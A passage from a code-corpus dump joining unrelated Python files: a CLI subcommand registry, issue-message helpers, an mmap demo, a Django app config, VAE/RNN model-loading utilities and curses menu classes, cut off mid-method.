                SELECT
                    sii.item_code,
                    sii.item_group,
                    sii.qty,
                    sii.net_amount,
                    sii.item_tax_rate
                FROM `tabSales Invoice Item` AS sii
                LEFT JOIN `tabSales Invoice` AS si ON
                    si.name = sii.parent
                WHERE {clauses}
                """.format(
                    clauses=_get_clauses(args)
                ),
                values=args,
                as_dict=1,
            )
        ),
        {"qty": 0, "net_amount": 0, "tax_amount": 0, "grand_total": 0},
    )
    return [merge(v, {"item_group": k}) for k, v in groups.items()]
| StarcoderdataPython |
9746649 | <reponame>nick-youngblut/StrainGE
# Copyright (c) 2016-2019, Broad Institute, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name Broad Institute, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import sys
import textwrap
import argparse
from abc import ABCMeta, abstractmethod
class Subcommand(metaclass=ABCMeta):
    """Base class for CLI subcommands.

    Concrete subcommands override :meth:`register_arguments` to declare
    their command-line options and implement :meth:`__call__` to run the
    subcommand's logic.
    """
    def register_arguments(self, subparser: argparse.ArgumentParser):
        """Hook for registering this subcommand's arguments on *subparser*.

        The default implementation registers nothing.
        """
    @abstractmethod
    def __call__(self, *args, **kwargs):
        """Execute the subcommand; invoked with the parsed CLI arguments."""
class SubcommandRegistry:
    """Builds an argparse-based CLI out of registered Subcommand objects.

    Each registered subcommand becomes an argparse subparser; ``run``
    dispatches to the selected subcommand and exits with its return code.
    """
    def __init__(self, version=None, subcommands_title="", *args, **kwargs):
        """Create the top-level parser.

        Args:
            version: when given, adds a ``--version`` option printing it.
            subcommands_title: heading for the subcommand listing in help.
            *args, **kwargs: forwarded to ``argparse.ArgumentParser``.
        """
        self.parser = argparse.ArgumentParser(*args, **kwargs)
        # Default of None lets run() detect "no subcommand given".
        self.parser.set_defaults(subcommand_func=None)
        self.subparsers = self.parser.add_subparsers(
            title=subcommands_title if subcommands_title else "Subcommands")
        if version:
            self.parser.add_argument(
                '--version', action='version', version=version)
    def register_subcommand(self, name: str, subcommand: "Subcommand", **kwargs):
        """Register *subcommand* under *name* and wire up its arguments."""
        # Reuse the subcommand's class docstring for the -h/--help output.
        # BUG FIX: `hasattr(cls, '__doc__')` is always True (every class has
        # the attribute, possibly set to None), so docstring-less subcommands
        # crashed on `None.strip()`. Test the docstring's value instead.
        subcommand_doc = subcommand.__class__.__doc__
        if subcommand_doc:
            # First paragraph becomes the short help line in the listing.
            first_help_line = subcommand_doc.strip().split('\n\n')[0].strip()
            kwargs['help'] = first_help_line
            kwargs['description'] = textwrap.dedent(subcommand_doc)
            kwargs['formatter_class'] = argparse.RawDescriptionHelpFormatter
        subparser = self.subparsers.add_parser(name, **kwargs)
        # Initialize subcommand arguments
        subcommand.register_arguments(subparser)
        subparser.set_defaults(subcommand_func=subcommand)
    def run(self, parser_args: argparse.Namespace):
        """Dispatch to the chosen subcommand and exit with its status.

        Prints help and exits 1 when no subcommand was selected; a
        subcommand returning None is treated as success (exit 0).
        """
        args_dict = vars(parser_args)
        subcommand_func = args_dict.pop('subcommand_func')
        if subcommand_func:
            rc = subcommand_func(**args_dict)
        else:
            self.parser.print_help()
            rc = 1
        if rc is None:
            rc = 0
        sys.exit(rc)
| StarcoderdataPython |
3438398 | <reponame>flexiooss/flexio-flow
from __future__ import annotations
from typing import Optional, Type
import abc
from VersionControlProvider.Issue import Issue
from VersionControlProvider.KeyWordsDialect import KeyWordsDialect
class IssueMessage(abc.ABC):
    """A commit/merge message optionally linked to a tracker issue.

    Subclasses provide the tracker-specific keyword dialect used to build
    "close" and "reference" trailers appended after the message body.
    """
    def __init__(self, message: str, issue: Optional[Type[Issue]] = None):
        self.message: str = message
        self.issue: Optional[Type[Issue]] = issue
    @staticmethod
    @abc.abstractmethod
    def keywords_dialect() -> Type[KeyWordsDialect]:
        # Subclasses return the KeyWordsDialect class for their tracker.
        pass
    def with_close(self) -> str:
        # Append "<close keyword> <issue ref>" on a new line (e.g.
        # "closes #12"); returns the plain message when no issue is set.
        if self.issue is not None:
            return """{message!s}
{close_keyword!s} {issue_ref!s}""".format(
                message=self.message,
                close_keyword=self.keywords_dialect().close(),
                issue_ref=self.issue.get_ref()
            )
        else:
            return self.message
    def with_ref(self) -> str:
        # Same as with_close() but uses the dialect's reference keyword,
        # which links the issue without closing it.
        if self.issue is not None:
            return """{message!s}
{ref_keyword!s} {issue_ref!s}""".format(
                message=self.message,
                ref_keyword=self.keywords_dialect().ref(),
                issue_ref=self.issue.get_ref()
            )
        else:
            return self.message
| StarcoderdataPython |
321540 | <reponame>ch1huizong/learning
#!/usr/bin/env python
#
# Copyright 2007 <NAME>.
#
"""Writing to a memory mapped file using a slice assignment.
"""
__version__ = "$Id$"
#end_pymotw_header
import mmap
import shutil
import contextlib
# Copy the example file
# (Python 2 example script: demonstrates in-place editing of a file through
# an mmap slice assignment. Works on a copy so lorem.txt stays pristine.)
shutil.copyfile('lorem.txt', 'lorem_copy.txt')
word = 'consectetuer'
reversed = word[::-1]  # NOTE(review): shadows the builtin `reversed`
print 'Looking for :', word
print 'Replacing with :', reversed
with open('lorem_copy.txt', 'r+') as f:
    with contextlib.closing(mmap.mmap(f.fileno(), 0)) as m:
        print 'Before:'
        print m.readline().rstrip()
        m.seek(0) # rewind
        loc = m.find(word)
        # Slice assignment writes straight into the mapped region; this only
        # works because the replacement has exactly the same length.
        m[loc:loc+len(word)] = reversed
        m.flush()  # push the change through to the underlying file
        m.seek(0) # rewind
        print 'After :'
        print m.readline().rstrip()
        f.seek(0) # rewind
        print 'File :'
        print f.readline().rstrip()
| StarcoderdataPython |
1619340 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import router_func as rfunc
import router_pass as rpass
# NOTE(review): bare attribute access with no effect — presumably a smoke
# test that `router_func` exposes `hoge` (raises AttributeError otherwise);
# confirm the intent.
rfunc.hoge
| StarcoderdataPython |
1809036 | <gh_stars>0
from django.apps import AppConfig
class HerdConfig(AppConfig):
    """Django application configuration for the `herd` app."""
    # Use 64-bit auto-incrementing primary keys for models in this app.
    default_auto_field = "django.db.models.BigAutoField"
    name = "herd"
| StarcoderdataPython |
9624970 | import logging
import os
from typing import Tuple, Union
import h5py
import torch
from PIL import Image
from torchvision import transforms
from models import select_vae_model, select_rnn_model, Controller
from models.vae import BaseVAE
from utils.setup_utils import load_yaml_config
from utils.constants import (
GUI_ENV_INITIAL_STATE_FILE_PATH, INITIAL_OBS_LATENT_VECTOR_FILE_NAME, MAX_COORDINATE
)
def vae_transformation_functions(img_size: int, dataset: str, output_activation_function: str):
    """Return the torchvision preprocessing pipeline used for VAE training.

    All pipelines resize to (img_size, img_size) and convert to a tensor in
    [0, 1]. The normalized dataset additionally standardizes with its stored
    channel statistics; otherwise the range is matched to the decoder's
    output activation ([0, 1] for sigmoid, [-1, 1] for tanh).

    Raises:
        RuntimeError: for an unknown output activation function.
    """
    steps = [
        transforms.Resize((img_size, img_size)),
        transforms.ToTensor(),
    ]
    if dataset == "gui_env_image_dataset_500k_normalize":
        mean, std = get_dataset_mean_std(dataset)
        steps.append(transforms.Normalize(mean, std))
        return transforms.Compose(steps)
    if output_activation_function == "sigmoid":
        pass  # ToTensor already yields the [0, 1] range sigmoid expects
    elif output_activation_function == "tanh":
        # Map [0, 1] tensors into the [-1, 1] range tanh expects.
        steps.append(transforms.Lambda(lambda x: 2.0 * x - 1.0))
    else:
        raise RuntimeError(f"Output activation function {output_activation_function} unknown")
    return transforms.Compose(steps)
def get_rnn_action_transformation_function(max_coordinate_size_for_task: int, reduce_action_coordinate_space_by: int,
                                           action_transformation_function_type: str):
    """Build the torchvision transform applied to raw click coordinates
    before they are fed to the RNN.

    Args:
        max_coordinate_size_for_task: coordinate range actually used by the
            task; must divide MAX_COORDINATE evenly.
        reduce_action_coordinate_space_by: overall downscaling factor for the
            coordinate space; values <= 0 disable downscaling.
        action_transformation_function_type: "tanh" additionally rescales the
            (possibly reduced) coordinates into [-1, 1].

    Returns:
        A transforms.Compose over integer coordinate tensors.
    """
    if reduce_action_coordinate_space_by > 0:
        already_reduced_factor = MAX_COORDINATE // max_coordinate_size_for_task
        # BUG FIX: floor division always yields an int, so the original
        # `isinstance(already_reduced_factor, int)` assertion could never
        # fail. Assert the divisibility the message actually promises.
        assert MAX_COORDINATE % max_coordinate_size_for_task == 0, ("For simplicity used_max_coordinate_size must be a multiple "
                                                                    f"of MAX_COORDINATE (which is {MAX_COORDINATE})")
        # Part of the requested reduction is already achieved by the task's
        # smaller coordinate range; only apply the remainder here.
        reduce_factor = reduce_action_coordinate_space_by / already_reduced_factor
        # -1.0 because coordinates start at 0
        new_max_coordinate = (max_coordinate_size_for_task / reduce_factor) - 1.0
        rnn_action_transformation_functions = [
            transforms.Lambda(lambda x: torch.div(x, reduce_factor, rounding_mode="floor"))
        ]
    else:
        rnn_action_transformation_functions = []
        new_max_coordinate = max_coordinate_size_for_task - 1.0
    if action_transformation_function_type == "tanh":
        # Linearly map [0, new_max_coordinate] onto [-1, 1].
        rnn_action_transformation_functions.append(
            transforms.Lambda(lambda x: ((2.0 * x) / new_max_coordinate) - 1.0)
        )
    return transforms.Compose(rnn_action_transformation_functions)
def get_rnn_reward_transformation_function(reward_output_mode: str, reward_output_activation_function: str):
    """
    Reward output mode mse: -> Use [0, 1] or [-1, 1] range depending on output activation function
    Reward output mode bce: -> Only use discrete 0 or 1 reward

    Returns a transform over reward tensors, or None when the rewards can be
    used unchanged. Raises RuntimeError on unknown mode/activation values.
    """
    if reward_output_mode == "bce":
        # Discretize: any positive reward becomes 1.0, zero stays 0.0.
        return transforms.Lambda(lambda x: x.greater(0).float())
    if reward_output_mode != "mse":
        raise RuntimeError(f"Reward output mode '{reward_output_mode}' unknown")
    if reward_output_activation_function == "sigmoid":
        # Rewards already arrive in [0, 1] from data generation.
        return None
    if reward_output_activation_function == "tanh":
        # Map [0, 1] rewards into the [-1, 1] range tanh expects.
        return transforms.Lambda(lambda x: 2.0 * x - 1.0)
    raise RuntimeError(f"Reward output activation function '{reward_output_activation_function}' unknown")
def get_dataset_mean_std(dataset: str):
    """Return the per-channel (mean, std) used to normalize *dataset*.

    Yields (None, None) for datasets without stored statistics.
    """
    known_stats = {
        "gui_env_image_dataset_500k_normalize": (
            [0.9338, 0.9313, 0.9288],
            [0.1275, 0.1329, 0.141],
        ),
    }
    return known_stats.get(dataset, (None, None))
def save_checkpoint(state: dict, is_best: bool, checkpoint_filename: str, best_filename: str):
    """Persist *state* to the rolling checkpoint file and, when *is_best*
    is True, additionally to the best-model file."""
    destinations = [checkpoint_filename]
    if is_best:
        destinations.append(best_filename)
    for destination in destinations:
        torch.save(state, destination)
def load_architecture(model_type: str, model_dir: str, device, load_best: bool = True, load_optimizer: bool = False,
                      rnn_batch_size=None, vae_directory=None):
    """Reconstruct a saved VAE or RNN model and load its weights.

    Args:
        model_type: "vae" or "rnn".
        model_dir: run directory holding config.yaml and the checkpoints.
        device: torch device the model and checkpoint are mapped to.
        load_best: load "best.pt" when True, otherwise "checkpoint.pt".
        load_optimizer: also return the optimizer state from the checkpoint.
        rnn_batch_size: RNN only — batch size to build the model with; falls
            back to the training batch size stored in the RNN config.
        vae_directory: RNN only — VAE run directory, read for the latent
            size the RNN consumes.

    Returns:
        (model, model_name) or, with load_optimizer, a
        (model, model_name, optimizer_state) triple.

    Raises:
        RuntimeError: for an unknown model_type.
    """
    config = load_yaml_config(os.path.join(model_dir, "config.yaml"))
    model_name = config["model_parameters"]["name"]
    if model_type == "vae":
        model_class = select_vae_model(model_name)
        model = model_class(config["model_parameters"]).to(device)
    elif model_type == "rnn":
        if rnn_batch_size is None:
            rnn_batch_size = config["experiment_parameters"]["batch_size"]
        # The RNN's input size depends on the VAE's latent dimensionality.
        vae_config = load_yaml_config(os.path.join(vae_directory, "config.yaml"))
        latent_size = vae_config["model_parameters"]["latent_size"]
        model_class = select_rnn_model(model_name)
        model = model_class(config["model_parameters"], latent_size, rnn_batch_size, device).to(device)
    else:
        raise RuntimeError(f"Model type {model_type} unknown")
    if load_best:
        state_dict_file_name = "best.pt"
    else:
        state_dict_file_name = "checkpoint.pt"
    checkpoint = torch.load(os.path.join(model_dir, state_dict_file_name), map_location=device)
    model.load_state_dict(checkpoint["state_dict"])
    if load_optimizer:
        return model, model_name, checkpoint["optimizer"]
    return model, model_name
def load_vae_architecture(vae_directory: str, device: torch.device, load_best: bool = True,
                          load_optimizer: bool = False) -> Union[Tuple[BaseVAE, str], Tuple[BaseVAE, str, dict]]:
    """Convenience wrapper: load a saved VAE via load_architecture."""
    options = {
        "model_dir": vae_directory,
        "device": device,
        "load_best": load_best,
        "load_optimizer": load_optimizer,
    }
    return load_architecture("vae", **options)
def load_rnn_architecture(rnn_directory: str, vae_directory: str, device: torch.device, batch_size=None,
                          load_best: bool = True,
                          load_optimizer: bool = False) -> Union[Tuple[BaseVAE, str], Tuple[BaseVAE, str, dict]]:
    """Convenience wrapper: load a saved RNN via load_architecture.

    The VAE directory is required to recover the latent size the RNN was
    trained against.
    """
    options = {
        "model_dir": rnn_directory,
        "device": device,
        "load_best": load_best,
        "load_optimizer": load_optimizer,
        "rnn_batch_size": batch_size,
        "vae_directory": vae_directory,
    }
    return load_architecture("rnn", **options)
def construct_controller(rnn_dir: str, vae_dir: str):
    """Instantiate an (untrained) Controller sized from the saved RNN and
    VAE run configurations."""
    rnn_params = load_yaml_config(os.path.join(rnn_dir, "config.yaml"))["model_parameters"]
    vae_params = load_yaml_config(os.path.join(vae_dir, "config.yaml"))["model_parameters"]
    # Controller consumes the VAE latent vector plus the RNN hidden state and
    # emits an action of the RNN's action size.
    return Controller(vae_params["latent_size"], rnn_params["hidden_size"], rnn_params["action_size"])
def load_controller_parameters(controller, controller_directory: str, device: torch.device):
    """Load the best saved controller weights into *controller*.

    Returns (controller, current_best) where current_best is the stored
    reward negated: the CMA-ES trainer minimizes the negated fitness, while
    the checkpoint stores it converted back to the normal sign.
    """
    checkpoint = torch.load(os.path.join(controller_directory, "best.pt"), map_location=device)
    current_best = -checkpoint["reward"]
    controller.load_state_dict(checkpoint["state_dict"])
    return controller, current_best
def generate_initial_observation_latent_vector(vae_dir, device, load_best: bool = True):
    """Encode the GUI environment's initial screenshot with the trained VAE
    and cache the latent distribution (mu, log_var) as an HDF5 file inside
    *vae_dir*.

    Returns the path to the cached file; an existing cache is reused.
    """
    initial_obs_path = os.path.join(vae_dir, INITIAL_OBS_LATENT_VECTOR_FILE_NAME)
    if os.path.exists(initial_obs_path):
        logging.info("Initial observation in latent space already calculated, continuing")
        return initial_obs_path
    vae, _ = load_vae_architecture(vae_dir, device, load_best=load_best, load_optimizer=False)
    vae.eval()
    # Rebuild exactly the preprocessing pipeline used during VAE training.
    vae_config = load_yaml_config(os.path.join(vae_dir, "config.yaml"))
    img_size = vae_config["experiment_parameters"]["img_size"]
    dataset = vae_config["experiment_parameters"]["dataset"]
    output_activation_function = vae_config["model_parameters"]["output_activation_function"]
    transformation_functions = vae_transformation_functions(img_size=img_size, dataset=dataset,
                                                            output_activation_function=output_activation_function)
    img = Image.open(GUI_ENV_INITIAL_STATE_FILE_PATH)
    img = transformation_functions(img)
    img = img.unsqueeze(0).to(device)  # Simulate batch dimension
    with torch.no_grad():
        mu, log_var = vae.encode(img)
    with h5py.File(initial_obs_path, "w") as f:
        f.create_dataset(f"mu", data=mu.cpu())
        f.create_dataset(f"log_var", data=log_var.cpu())
    # Explicitly delete vae to free memory from gpu
    del vae
    torch.cuda.empty_cache()
    logging.info("Calculated and stored the initial observation in latent space")
    return initial_obs_path
| StarcoderdataPython |
4980572 | <filename>mc_manager/curses_helpers.py
import curses
from curses.textpad import Textbox, rectangle
class item_base():
    """The base class for menu items
    """
    def init_curses(self):
        """A few curses settings shared across all items
        """
        curses.noecho()     # do not echo typed characters
        curses.cbreak()     # react to keys immediately, without Enter
        curses.curs_set(0)  # hide the cursor
    def display(self, y_pos, key_x, value_x, stdscr, selected, formatting=0):
        """This is meant to be overloaded by a child
        """
        pass
class item_title(item_base):
    """class for a centered menu item
    """
    def __init__(self, title, on_change=None):
        # NOTE(review): `on_change` and `max_len` are never used by this
        # class — presumably kept for interface parity with other items.
        self.title = title
        self.max_len = 0
        self.name = title
    def display(self, y_pos, stdscr, selected, formatting=0):
        """Draw the title centered on row *y_pos*.

        Returns the title string when *selected* is truthy, else None.
        Note: takes fewer positional args than item_base.display.
        """
        self.init_curses()
        cols = stdscr.getmaxyx()[1]
        # One window for the centered title text, plus a full-width window
        # used only to blank the rest of the row.
        window = curses.newwin(1,len(self.title)+1,y_pos,int((cols/2)-len(self.title)/2))
        padding = curses.newwin(1,cols,y_pos,0)
        padding.erase()
        padding.addstr(" "*(cols-1))
        padding.refresh()
        window.erase()
        window.addstr(0,0,self.title, formatting)
        window.refresh()
        del window
        del padding
        if selected:
            return self.title
        return None
class item_editor(item_base):
    """class for a menu item with a key and editable value
    """
    def __init__(self, key, value, max_val_len=20):
        """This is a display item which has a key and an editable value
        Args:
            key (str): The key to be displayed
            value (str,int,float,bool): The value to be edited
            max_val_len (int, optional): The maximum length of the value field.
                Defaults to 20.
        """
        self.key=key
        self.value=value
        self.name = key
        # Pick the Textbox validator matching the value's type; bool values
        # never use a Textbox (they are toggled in bool_validator instead).
        if type(value) is str:
            self.validation = self.str_validator
        elif type(value) is int:
            self.validation = self.int_validator
        elif type(value) is float:
            self.validation = self.float_validator
        self.max_val_len = max_val_len
    def display(self, y_pos, key_x, value_x, stdscr, selected, formatting=0):
        """Displays the item
        Args:
            y_pos (int): The y position on stdscr for the item to be displayed
            key_x (int): the x position on stdscr for the key to be displayed
            value_x (int): the x position on stdscr for the value to be displayed
            stdscr (_CursesWindow): a curses windows or pad to use
            selected (bool): Whether or not this item is selected
            formatting (int, optional): a curses format to use. Defaults to 0.
        Returns:
            None, tuple: returns (self.key, self.value) if an edit was made,
            otherwise None
        """
        self.init_curses()
        key_window=curses.newwin(1,value_x-key_x,y_pos,key_x)
        value_window=curses.newwin(1,self.max_val_len,y_pos,value_x)
        changed=False
        if selected:
            if type(self.value) is bool:
                # Booleans are toggled with a mini event loop of their own.
                self.bool_validator(stdscr,value_window)
            else:
                curses.curs_set(1)  # show the cursor while editing
                self.box = Textbox(value_window)
                # edit() blocks until the validator returns BEL; the
                # validator also commits the gathered text to self.value.
                self.box.edit(self.validation)
                self.box=None
            changed=True
        key_window.erase()
        key_window.addstr(0,0,self.key, formatting)
        value_window.erase()
        value_window.addstr(str(self.value), formatting)
        key_window.refresh()
        value_window.refresh()
        del key_window
        del value_window
        return (self.key,self.value) if changed else None
    def str_validator(self, key):
        """This function maps a given keystroke to the desired response when
        the user is editing a value of type str
        Args:
            key (int): The key pressed
        Returns:
            int: the key to returns
        """
        # NOTE(review): `curses.ascii` is a submodule; the file imports only
        # `curses` and `curses.textpad` — confirm curses.ascii resolves here.
        if self.box == None:  # not currently editing; ignore stray calls
            return
        if key == 27:  # ESC aborts the edit without committing
            return curses.ascii.BEL
        elif key == curses.KEY_BACKSPACE or key == 127:
            return 8  # normalize all backspace variants to ASCII BS
        elif key == curses.KEY_ENTER or key == 10 or key == 13:
            # Commit the edited text, then terminate the Textbox with BEL.
            self.value=self.box.gather().strip()
            return curses.ascii.BEL
        else:
            return key
    def float_validator(self, key):
        """This function maps a given keystroke to the desired response when
        the user is editing a value of type float
        Args:
            key (int): The key pressed
        Returns:
            int: the key to returns
        """
        if self.box == None:
            return
        if key == 27:  # ESC aborts
            return curses.ascii.BEL
        elif key == curses.KEY_BACKSPACE or key == 127:
            return 8
        elif key == curses.KEY_ENTER or key == 10 or key == 13:
            self.value=float(self.box.gather().strip())
            return curses.ascii.BEL
        elif key == 46:  # '.' — allow a single decimal point
            gather = self.box.gather()
            # If dot hasn't been used and the string isn't empty
            if (not '.' in gather) and (gather.strip()):
                return key
        if key in range(48,58): # allowed values (digits 0-9)
            return key
    def int_validator(self, key):
        """This function maps a given keystroke to the desired response when
        the user is editing a value of type int
        Args:
            key (int): The key pressed
        Returns:
            int: the key to returns
        """
        if self.box == None:
            return
        if key == 27:  # ESC aborts
            return curses.ascii.BEL
        elif key == curses.KEY_BACKSPACE or key == 127:
            return 8
        elif key == curses.KEY_ENTER or key == 10 or key == 13:
            # Keep the previous value when the field was left empty.
            in_val = self.box.gather().strip()
            if in_val != "":
                self.value=int(in_val)
            return curses.ascii.BEL
        if key in range(48,58): # allowed values (digits 0-9)
            return key
    def bool_validator(self, stdscr, window): # This one's special and runs without textbox
        """This function gets a keystroke and toggles self.value, exiting without
        changing on ESC and exiting with changes on ENTER
        Args:
            stdscr (_CursesWindow): The parent screen object
            window (_CursesWindow): The window object text is being written to
        Returns:
            int: the key to returns
        """
        value = self.value
        while True:
            key = stdscr.getch()
            if key == 27:  # ESC: discard the toggled value
                return value
            elif key in [curses.KEY_UP, curses.KEY_DOWN,
                         curses.KEY_LEFT, curses.KEY_RIGHT, 32]: # 32 is space
                value = not value
                window.erase()
                window.addstr(str(value), curses.A_STANDOUT)
                window.refresh()
            elif key == curses.KEY_ENTER or key == 10 or key == 13:
                self.value = value  # commit the toggled value
                return value
class list_base():
    """base class for lists of items

    Maintains a selection index and a scroll offset (`start`) over `items`;
    subclasses customize rendering and key handling via the hook methods.
    """
    def __init__(self, items):
        self.items = items
        self.selected = 0      # index of the highlighted item
        self.returnVal = None  # value eventually returned by display()
    def display(self, stdscr):
        """Displays a list of items
        Args:
            stdscr (_CursesWindow): The window object to display to
        Returns:
            any: returns whatever the child class sets self.returnVal to
        """
        self.rows, self.cols = stdscr.getmaxyx()
        self.middle_col = int(self.cols/2)
        self.start = 0  # first visible item (scroll offset)
        stdscr.erase()
        stdscr.refresh()
        self.pre_loop(stdscr)
        while True:
            # Re-read the size each pass so terminal resizes are honoured.
            self.rows, self.cols = stdscr.getmaxyx()
            if not self.loop(stdscr):
                break
            if not self.get_key(stdscr):
                break
        self.post_loop(stdscr)
        return self.returnVal
    def pre_loop(self, stdscr):
        """This is run before the main loop, and is available to be overloaded
        Args:
            stdscr (_CursesWindow): The window object to display to
        """
        pass
    def loop(self, stdscr):
        """This is the main loop, and is meant to be overloaded
        Args:
            stdscr (_CursesWindow): The window object to display to
        Returns:
            bool: True to continue loop, false otherwise
        """
        return True
    def post_loop(self, stdscr):
        """This is run after the loop completes and is available to be overloaded
        Args:
            stdscr (_CursesWindow): The window object to display to
        """
        pass
    def get_key(self, stdscr):
        """This function handles commonly used keys,
        and calls overloadable functions to deal with them
        Args:
            stdscr (_CursesWindow): The window object to display to
        Returns:
            bool: True to continue the main loop, False to stop
        """
        key = stdscr.getch()
        if key == curses.KEY_DOWN:
            return self.key_down()
        elif key == curses.KEY_UP:
            return self.key_up()
        if key in [curses.KEY_ENTER, 10, 13]:
            return self.key_enter()
        elif key == 27:  # ESC stops the loop
            return False
        else:
            return True
    def key_enter(self):
        """This is a function called when enter is pressed
        it is available to be overloaded
        Returns:
            bool: True to continue the main loop, False to stop
        """
        return True
    def key_up(self):
        """This is a function called when the up key is pressed
        it is available to be overloaded, but calls sel_up() by default
        Returns:
            bool: True to continue the main loop, False to stop
        """
        return self.sel_up()
    def key_down(self):
        """This is a function called when the down key is pressed
        it is available to be overloaded, but calls sel_down() by default
        Returns:
            bool: True to continue the main loop, False to stop
        """
        return self.sel_down()
    def sel_up(self):
        """This function is called to move the cursor up
        Scrolls when the selection sits on the top visible row and wraps to
        the bottom of the list when already at the first item.
        """
        if self.selected == self.start:
            if self.start > 0:
                self.start -= 1
                self.selected -= 1
            else:
                # Wrap around to the end of the list.
                self.selected = len(self.items)-1
                self.start = max(0,len(self.items)-self.rows)
        else:
            self.selected -= 1
        return True
    def sel_down(self):
        """This function is called to move the cursor down
        Scrolls when the selection reaches the last visible row and wraps to
        the top of the list when already at the final item.
        """
        if self.selected + 1 >= self.rows + self.start or self.selected >= len(self.items) - 1:
            if ((self.start + self.rows < len(self.items)) and (self.selected < len(self.items))):
                self.start += 1
                self.selected += 1
            else:
                # Wrap around to the start of the list.
                self.selected = 0
                self.start = 0
        else:
            self.selected += 1
        return True
class list_editor(list_base):
    """class for a list of item_editor items

    display() returns the accumulated list of (key, value) tuples for every
    edit the user committed.
    """
    def __init__(self, items):
        """Calls parent init and also finds the
        largest sized string in the list of items given
        Args:
            items (list): a list of items which share the item_base parent
                to be displayed in the list
        """
        super().__init__(items)
        # Longest key among the editor items (non-editors contribute ""),
        # used to right-align the key column against the screen centre.
        self.keylength = (
            max(
                map(
                    len,
                    (
                        (x.key if type(x) is item_editor else "" for x in self.items)
                    )
                )
            )
        )
        self.edit = False  # set by key_enter(); consumed by loop()
        return
    def pre_loop(self, stdscr):
        """Sets up the variable returnVal to be used as a list
        Args:
            stdscr (_CursesWindow): The window object to display to
        """
        self.returnVal = []
        return
    def loop(self, stdscr):
        """This is the function called in the loop
        inside the parent's display() function
        Args:
            stdscr (_CursesWindow): The window object to display to
        Returns:
            bool: true to continue the loop, false to stop it
        """
        for i in range(len(self.items)):
            # Only draw rows inside the current scroll window.
            if i >= self.start and i <= self.start + self.rows:
                if type(self.items[i]) is item_editor:
                    # Editing is triggered only for the selected row after
                    # key_enter() set self.edit.
                    setting = self.items[i].display(
                        (i-self.start),
                        (self.middle_col-(self.keylength+2)),
                        (self.middle_col+2),
                        (stdscr),
                        (i==self.selected and self.edit),
                        (curses.A_STANDOUT if i==self.selected else 0))
                elif type(self.items[i]) is item_title:
                    # NOTE(review): this branch does not assign `setting`; if
                    # the first visible item is an item_title the check below
                    # can hit an UnboundLocalError — confirm and guard.
                    self.items[i].display(
                        (i-self.start),
                        (stdscr),
                        (False),
                        (curses.A_STANDOUT if i==self.selected else 0))
                else:
                    setting = None
                if type(setting) is tuple:
                    self.returnVal.append(setting) # if changed, append new setting
        self.edit = False
        return True
    def key_enter(self):
        """This is the function called when enter is pressed
        Arms edit mode for the selected item; the next loop() pass opens it.
        Returns:
            bool: true to continue the loop
        """
        self.edit = True
        return True
# TODO: Replace with new list_h function using items
class select_h():
    """Horizontal single-row selector.

    Renders `items` side by side, centered; left/right arrows move the
    highlight (wrapping), Enter returns the chosen string, ESC returns None.
    """
    def __init__(self, items, title=""):
        self.items = items
        self.title = title
    def display(self, stdscr):
        """Run the selection loop on *stdscr* until Enter or ESC."""
        curses.noecho()
        curses.cbreak()
        curses.curs_set(0)
        selected=0
        while True:
            rows, cols = stdscr.getmaxyx()
            middle_column = int(cols / 2)
            middle_row = int(rows / 2)
            # Center the title on the top row.
            half_length_of_message = int(len(self.title) / 2)
            x_position = middle_column - half_length_of_message
            stdscr.erase()
            stdscr.addstr(0, x_position, self.title+"\n", curses.A_BOLD)
            for i in range(len(self.items)):
                # Get centered position
                half_length_of_message = int(len(" ".join(self.items)) / 2)
                y_position = middle_row
                x_position = middle_column - half_length_of_message
                # Print
                # Offset each item by the widths of all preceding items plus
                # one space per separator.
                if selected == i:
                    stdscr.addstr(y_position, x_position +
                                  (sum(map(len,self.items[0:i])))+i, self.items[i], curses.A_STANDOUT)
                else:
                    stdscr.addstr(y_position, x_position +
                                  (sum(map(len,self.items[0:i])))+i, self.items[i])
            stdscr.refresh()
            key = stdscr.getch()
            if key == curses.KEY_RIGHT:
                selected = (selected + 1)%len(self.items)
            elif key == curses.KEY_LEFT:
                selected = (selected - 1)%len(self.items)
            elif key == curses.KEY_ENTER or key == 10 or key == 13:
                return self.items[selected]
            elif key == 27: # escape
                return None
# TODO: Replace with new list_menu function using items
class select_v():
    """Vertical selector (non-scrolling).

    Renders `items` stacked and centered; up/down arrows move the highlight
    (wrapping), Enter returns the chosen string, ESC returns None. Assumes
    the whole list fits on screen.
    """
    def __init__(self, items, title=""):
        self.items = items
        self.title = title
    def display(self, stdscr):
        """Run the selection loop on *stdscr* until Enter or ESC."""
        curses.noecho()
        curses.cbreak()
        curses.curs_set(0)
        selected=0
        while True:
            rows, cols = stdscr.getmaxyx()
            middle_row = int(rows / 2)
            middle_column = int(cols / 2)
            # First row of the vertically-centered item column.
            top_row = int(middle_row-(len(self.items)/2))
            half_length_of_message = int(len(self.title) / 2)
            x_position = middle_column - half_length_of_message
            stdscr.erase()
            stdscr.addstr(0, x_position, self.title+"\n", curses.A_BOLD)
            for i in range(len(self.items)):
                # Get centered position
                half_length_of_message = int(len(self.items[i]) / 2)
                y_position = top_row
                x_position = middle_column - half_length_of_message
